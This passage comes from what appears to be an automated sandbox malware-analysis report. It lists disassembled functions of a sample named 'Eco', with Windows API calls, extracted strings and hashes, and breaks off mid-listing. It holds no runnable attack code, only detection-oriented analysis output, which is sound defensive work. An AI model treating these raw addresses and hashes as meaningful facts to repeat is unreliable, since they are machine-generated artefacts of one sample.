                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                          • String ID: %s%u
                          • API String ID: 3744389584-679674701
                          • Opcode ID: 8f34b599a5ab0204a05283759957f51624fc503e36f6427d77f2455341b7e942
                          • Instruction ID: 2581d924257e3238ee1742a625146c581ed198faff75dd5ae852f0558344f09f
                          • Opcode Fuzzy Hash: 8f34b599a5ab0204a05283759957f51624fc503e36f6427d77f2455341b7e942
                          • Instruction Fuzzy Hash: 73A1F171204706AFEB14DF64C898BAABFE8FF85354F004629F999D3190DB30E995CB91
                          Function 0056B850 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                          Download Yara Rule
                          APIs
                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0056B894
                          • _wcscmp.LIBCMT ref: 0056B8A5
                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0056B8CD
                          • CharUpperBuffW.USER32(?,00000000), ref: 0056B8EA
                          • _wcscmp.LIBCMT ref: 0056B908
                          • _wcsstr.LIBCMT ref: 0056B919
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0056B951
                          • _wcscmp.LIBCMT ref: 0056B961
                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0056B988
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0056B9D1
                          • _wcscmp.LIBCMT ref: 0056B9E1
                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0056BA09
                          • GetWindowRect.USER32(00000004,?), ref: 0056BA72
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                          • String ID: @$ThumbnailClass
                          • API String ID: 1788623398-1539354611
                          • Opcode ID: ba6442c6d40dfd48ca24d01177348898e53252bae2dc071b640a45ccd4fbfb8c
                          • Instruction ID: 15a6204c1bdfa8abf4ff3321e3021cdb82ece2bf05c7534eaa100d20fef146c3
                          • Opcode Fuzzy Hash: ba6442c6d40dfd48ca24d01177348898e53252bae2dc071b640a45ccd4fbfb8c
                          • Instruction Fuzzy Hash: 43817C710042069BEB14DF54C985FAA7FE8FF94714F048569EE85CB096DB30DE8ACBA1
                          Function 0059CA21 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                          • DragQueryPoint.SHELL32(?,?), ref: 0059CA4A
                            • Part of subcall function 0059AF24: ClientToScreen.USER32(?,?), ref: 0059AF4D
                            • Part of subcall function 0059AF24: GetWindowRect.USER32(?,?), ref: 0059AFC3
                            • Part of subcall function 0059AF24: PtInRect.USER32(?,?,0059C437), ref: 0059AFD3
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0059CAB3
                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0059CABE
                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0059CAE1
                          • _wcscat.LIBCMT ref: 0059CB11
                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0059CB28
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0059CB41
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0059CB58
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0059CB7A
                          • DragFinish.SHELL32(?), ref: 0059CB81
                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0059CC74
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pr]
                          • API String ID: 169749273-3325259009
                          • Opcode ID: b7915a4365b68d57bbcd18e74851b4d6911e7216e3601fc7e04ff6f03008a358
                          • Instruction ID: 836f2fe047552a29f2c486a94030e64c2bd2b63431f6d138b218d779c32b07b1
                          • Opcode Fuzzy Hash: b7915a4365b68d57bbcd18e74851b4d6911e7216e3601fc7e04ff6f03008a358
                          • Instruction Fuzzy Hash: 45612571108301AFDB11EF64DC89E9BBFE8FBD9750F000A1EF595921A1DB709A49CB92
                          Function 0056B699 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                          • API String ID: 1038674560-1810252412
                          • Opcode ID: 7e496c1c7f95321b0ef9f5aa83ed92a85dd8b3b915df8a9e2fef1a31f22afaa7
                          • Instruction ID: 2c20a1fe23ba380187ac54beb5a270f6b64ca45b9408718357cbbbb6082b1e04
                          • Opcode Fuzzy Hash: 7e496c1c7f95321b0ef9f5aa83ed92a85dd8b3b915df8a9e2fef1a31f22afaa7
                          • Instruction Fuzzy Hash: CF31B231944616EAEB14EAA0DD87FBE7F64FFA1760F20052AF402B20D2EF616E44C655
                          Function 0056C97A Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • LoadIconW.USER32(00000063), ref: 0056C98D
                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0056C99F
                          • SetWindowTextW.USER32(?,?), ref: 0056C9B6
                          • GetDlgItem.USER32(?,000003EA), ref: 0056C9CB
                          • SetWindowTextW.USER32(00000000,?), ref: 0056C9D1
                          • GetDlgItem.USER32(?,000003E9), ref: 0056C9E1
                          • SetWindowTextW.USER32(00000000,?), ref: 0056C9E7
                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0056CA08
                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0056CA22
                          • GetWindowRect.USER32(?,?), ref: 0056CA2B
                          • SetWindowTextW.USER32(?,?), ref: 0056CA96
                          • GetDesktopWindow.USER32 ref: 0056CA9C
                          • GetWindowRect.USER32(00000000), ref: 0056CAA3
                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0056CAEF
                          • GetClientRect.USER32(?,?), ref: 0056CAFC
                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0056CB21
                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0056CB4C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                          • String ID:
                          • API String ID: 3869813825-0
                          • Opcode ID: ba95a32a77f7ecec13b5c2cefde5173f7fbaac7ce322790c59825f8535103b5c
                          • Instruction ID: 6c8e31cf9d92b56798efa4fd1ad9eb67badc1f899494664ff90b0849c7fb4640
                          • Opcode Fuzzy Hash: ba95a32a77f7ecec13b5c2cefde5173f7fbaac7ce322790c59825f8535103b5c
                          • Instruction Fuzzy Hash: 6C515B31900709AFDB20DFA8CD89B6EBFF5FF54709F004929E686A35A0C774A958DB50
                          Function 005854AD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                          Download Yara Rule
                          APIs
                          • LoadCursorW.USER32(00000000,00007F8A), ref: 005854C3
                          • LoadCursorW.USER32(00000000,00007F00), ref: 005854CE
                          • LoadCursorW.USER32(00000000,00007F03), ref: 005854D9
                          • LoadCursorW.USER32(00000000,00007F8B), ref: 005854E4
                          • LoadCursorW.USER32(00000000,00007F01), ref: 005854EF
                          • LoadCursorW.USER32(00000000,00007F81), ref: 005854FA
                          • LoadCursorW.USER32(00000000,00007F88), ref: 00585505
                          • LoadCursorW.USER32(00000000,00007F80), ref: 00585510
                          • LoadCursorW.USER32(00000000,00007F86), ref: 0058551B
                          • LoadCursorW.USER32(00000000,00007F83), ref: 00585526
                          • LoadCursorW.USER32(00000000,00007F85), ref: 00585531
                          • LoadCursorW.USER32(00000000,00007F82), ref: 0058553C
                          • LoadCursorW.USER32(00000000,00007F84), ref: 00585547
                          • LoadCursorW.USER32(00000000,00007F04), ref: 00585552
                          • LoadCursorW.USER32(00000000,00007F02), ref: 0058555D
                          • LoadCursorW.USER32(00000000,00007F89), ref: 00585568
                          • GetCursorInfo.USER32(?), ref: 00585578
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Cursor$Load$Info
                          • String ID:
                          • API String ID: 2577412497-0
                          • Opcode ID: af9304c66151ae12165792185060b34fc002d88e755b4b826a8f9b140722c749
                          • Instruction ID: 203c0a003fa322c3a11da358a65f95396a365498540622da18adf18578abd18a
                          • Opcode Fuzzy Hash: af9304c66151ae12165792185060b34fc002d88e755b4b826a8f9b140722c749
                          • Instruction Fuzzy Hash: EF3107B0D4831A6ADF109FB69C8999EBFE9FF04750F50452AE50CF7280EA78A5048F91
                          Function 0059A5A6 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 0059A646
                          • DestroyWindow.USER32(00000000,?), ref: 0059A6C0
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0059A73A
                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0059A75C
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0059A76F
                          • DestroyWindow.USER32(00000000), ref: 0059A791
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00510000,00000000), ref: 0059A7C8
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0059A7E1
                          • GetDesktopWindow.USER32 ref: 0059A7FA
                          • GetWindowRect.USER32(00000000), ref: 0059A801
                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0059A819
                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0059A831
                            • Part of subcall function 005129AB: GetWindowLongW.USER32(?,000000EB), ref: 005129BC
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                          • String ID: 0$tooltips_class32
                          • API String ID: 1297703922-3619404913
                          • Opcode ID: e4cd242a5ca190743d9d1c6d747a842be4a357a7655e110072b15bf1a214dfd1
                          • Instruction ID: a22a8caefe9a6092752e22b4e0720f366b7e1fff75cbd5fd1758eecaeb7925ac
                          • Opcode Fuzzy Hash: e4cd242a5ca190743d9d1c6d747a842be4a357a7655e110072b15bf1a214dfd1
                          • Instruction Fuzzy Hash: 5271AE70140305AFDB21CF18CC49F6A7BE5FB99304F04091EF985872A1DB71E95AEBA2
                          Function 00578142 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(00000000), ref: 00578187
                          • VariantCopy.OLEAUT32(00000000,?), ref: 00578190
                          • VariantClear.OLEAUT32(00000000), ref: 0057819C
                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0057828A
                          • __swprintf.LIBCMT ref: 005782BA
                          • VarR8FromDec.OLEAUT32(?,?), ref: 005782E6
                          • VariantInit.OLEAUT32(?), ref: 00578397
                          • SysFreeString.OLEAUT32(?), ref: 0057842B
                          • VariantClear.OLEAUT32(?), ref: 00578485
                          • VariantClear.OLEAUT32(?), ref: 00578494
                          • VariantInit.OLEAUT32(00000000), ref: 005784D2
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                          • API String ID: 3730832054-3931177956
                          • Opcode ID: 4fbfb13838fd840f69ecaeacd2fbb8ea8ab23f3630d28a47bcf94703c4db5a30
                          • Instruction ID: 55d94507875d5dbcd1a526f4efbcd2d55c7bbdb9c63c0f47fed8a47eab9467ed
                          • Opcode Fuzzy Hash: 4fbfb13838fd840f69ecaeacd2fbb8ea8ab23f3630d28a47bcf94703c4db5a30
                          • Instruction Fuzzy Hash: 38D1FF70640A16EBDF209F65E84CB7ABFB4BF45700F54C859E419AB281CF70AC45EBA1
                          Function 00594797 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 00594829
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00594874
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BuffCharMessageSendUpper
                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                          • API String ID: 3974292440-4258414348
                          • Opcode ID: db4672fddc745c4e275e32b5bcaf0d61da83de189bd11f6d1911d28cb2d987e0
                          • Instruction ID: 0327c21bd579585b158f573731b86b350c7cdd87d6a0bcdcd3aca7520e12559c
                          • Opcode Fuzzy Hash: db4672fddc745c4e275e32b5bcaf0d61da83de189bd11f6d1911d28cb2d987e0
                          • Instruction Fuzzy Hash: 019139742047029FDB05EF10C855E6ABFA6BF94354F04995CE8965B3A2CB31ED4ACF82
                          Function 0059BBEB Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0059BCA1
                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,005995AF), ref: 0059BCFD
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0059BD36
                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0059BD79
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0059BDB0
                          • FreeLibrary.KERNEL32(?), ref: 0059BDBC
                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0059BDCC
                          • DestroyIcon.USER32(?,?,?,?,?,005995AF), ref: 0059BDDB
                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0059BDF8
                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0059BE04
                            • Part of subcall function 0053305F: __wcsicmp_l.LIBCMT ref: 005330E8
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                          • String ID: .dll$.exe$.icl
                          • API String ID: 1212759294-1154884017
                          • Opcode ID: 7082e3d11611a83a742b7148f62a6499e299427887d299ba1a72e3c8962979a4
                          • Instruction ID: 0f32ea211d76e44056fa241800505dbeba46966b4fca3452ed723f1f01a0b9db
                          • Opcode Fuzzy Hash: 7082e3d11611a83a742b7148f62a6499e299427887d299ba1a72e3c8962979a4
                          • Instruction Fuzzy Hash: 7261FEB150061ABAFF14DF64ED49FBE7BA8FB08710F104209F915D60D0DBB4AA84DBA0
                          Function 005123F7 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 170timeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00511F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00512412,?,00000000,?,?,?,?,00511AA7,00000000,?), ref: 00511F76
                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 005124AF
                          • KillTimer.USER32(-00000001,?,?,?,?,00511AA7,00000000,?,?,00511EBE,?,?), ref: 0051254A
                          • DestroyAcceleratorTable.USER32(00000000), ref: 0054BF17
                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00511AA7,00000000,?,?,00511EBE,?,?), ref: 0054BF48
                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00511AA7,00000000,?,?,00511EBE,?,?), ref: 0054BF5F
                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00511AA7,00000000,?,?,00511EBE,?,?), ref: 0054BF7B
                          • DeleteObject.GDI32(00000000), ref: 0054BF8D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                          • String ID: hZ
                          • API String ID: 641708696-3824762921
                          • Opcode ID: f5200253ecd8ed905339b8ca3a2a1764fe183b07e1ae7ea6e51839744eb40090
                          • Instruction ID: aeb1604423d58488ce5f6153250ca73146f24b6f7552eb24acb347e8c9f035db
                          • Opcode Fuzzy Hash: f5200253ecd8ed905339b8ca3a2a1764fe183b07e1ae7ea6e51839744eb40090
                          • Instruction Fuzzy Hash: B061CF31111601DFEB359F14DD48BAA7FF1FB5031AF10991AE04647AA0C775A8EAEF90
                          Function 0057A0E8 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                          Download Yara Rule
                          APIs
                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0057A12F
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0057A150
                          • __swprintf.LIBCMT ref: 0057A1A9
                          • __swprintf.LIBCMT ref: 0057A1C2
                          • _wprintf.LIBCMT ref: 0057A269
                          • _wprintf.LIBCMT ref: 0057A287
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: LoadString__swprintf_wprintf$_memmove
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                          • API String ID: 311963372-3080491070
                          • Opcode ID: 76c9bd7642273a367e765fc79776e1063086ee2b97aa93dc8b38e0513567831e
                          • Instruction ID: fe62fe69ee260984c50796c7e350932bf1b26f0a1078d72b22a860d48e30b0ff
                          • Opcode Fuzzy Hash: 76c9bd7642273a367e765fc79776e1063086ee2b97aa93dc8b38e0513567831e
                          • Instruction Fuzzy Hash: 7451C17190051AAACF14EBE0ED4AEEEBF78BF65340F104125F409B2092DB312F48DBA5
                          Function 0057A802 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                            • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                          • CharLowerBuffW.USER32(?,?), ref: 0057A87B
                          • GetDriveTypeW.KERNEL32 ref: 0057A8C8
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057A910
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057A947
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057A975
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                          • API String ID: 2698844021-4113822522
                          • Opcode ID: 5e2b27bbea7aba419e22929c0d012c5de88b815e8ecfcb257a86b4faa1beb797
                          • Instruction ID: a91f94668e14b7718f0ba1f557df65d46628f77b668d407f91764442de26e0d5
                          • Opcode Fuzzy Hash: 5e2b27bbea7aba419e22929c0d012c5de88b815e8ecfcb257a86b4faa1beb797
                          • Instruction Fuzzy Hash: CB515A711047169FC700EF20D895D6ABBE4FFD5758F00896CF89A97291DB31AE09CB92
                          Function 0057A69F Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0057A6BF
                          • __swprintf.LIBCMT ref: 0057A6E1
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0057A71E
